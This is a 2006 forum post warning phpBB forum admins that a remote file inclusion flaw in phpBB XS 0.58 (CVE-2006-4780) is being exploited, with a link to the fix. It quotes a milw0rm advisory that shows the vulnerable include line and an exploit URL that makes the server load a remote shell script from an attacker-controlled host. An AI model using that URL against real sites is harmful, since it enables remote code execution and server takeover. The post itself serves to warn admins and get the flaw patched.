LITTLEBLACKDOG.COM Forum Index LITTLEBLACKDOG.COM

 
LWD LWD   FAQ FAQ   Memberlist Memberlist   Usergroups Usergroups   Active Topics Active Topics   Register Register  
  Profile Profile   Log in to check your private messages Log in to check your private messages   Log in Log in  
  Who is Online Who is Online   Image Gallery Image Gallery   Chat Chat   Search Search  
  LWDGear       LBDGear  

phpBB XS 0.58 Vulnerability
 View next topic
View previous topic
Post new topic     Reply to topic   LITTLEBLACKDOG.COM Forum Index » Site Feedback
Author Message
EdisonRex
Guide Dog
Guide Dog


Joined: 06 May 2002
Posts: 9929
Location: Not Moscow
Post Posted: Mon Sep 18, 2006 12:44 am   Post subject: phpBB XS 0.58 Vulnerability Reply with quote Back to top  
FYI, it is being exploited.

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-4780

Any of you phpBB forum admins, of you are using XS you need to go look for the fix.

milw0rm wrote:

Author: AzzCoder

Vendor: http://www.phpbbxs.eu/

Vulnerable File: includes/functions.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

Method To Use:

http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?

# milw0rm.com [2006-09-12]



http://www.phpbbxs.eu/viewtopic.php?p=3078#3078

_________________
Garret: It's so retro.
EGM: What does retro mean to you?
Parker: Like, old and outdated.
View user's profile Send private message AIM Address Yahoo Messenger
Display posts from previous:   
Post new topic     Reply to topic   LITTLEBLACKDOG.COM Forum Index » Site Feedback
 
Jump to:  

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2002 phpBB Group
phpBB SEO
All times are GMT - 8 Hours

Help us keep advertisements off this site. Donate today!